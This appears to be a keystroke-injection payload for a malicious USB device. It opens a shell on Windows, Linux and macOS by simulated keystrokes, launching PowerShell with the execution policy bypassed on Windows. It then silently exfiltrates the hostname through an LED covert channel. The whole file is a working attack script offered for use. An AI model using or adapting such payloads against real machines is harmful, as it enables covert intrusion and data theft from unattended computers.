NAME Exfil Hostname
DESCRIPTION Silently exfiltrates hostname via LED covert channel
CATEGORY recon
PLATFORMS WIN,MAC,LINUX
OPTION DELAY 2000 "Initial HID delay (ms)"
PLATFORM WIN
DELAY {{DELAY}}
LED_COLOR RED
GUI r
DELAY 800
STRING powershell -nop -ep bypass
ENTER
DELAY 1500
EXFIL hostname
LED_COLOR GREEN
PLATFORM LINUX
DELAY {{DELAY}}
LED_COLOR RED
CTRL ALT t
DELAY 1400
EXFIL hostname
LED_COLOR GREEN
PLATFORM MAC
DELAY {{DELAY}}
LED_COLOR RED
GUI SPACE
DELAY 700
STRING Terminal
ENTER
DELAY 1400
EXFIL hostname
LED_COLOR GREEN
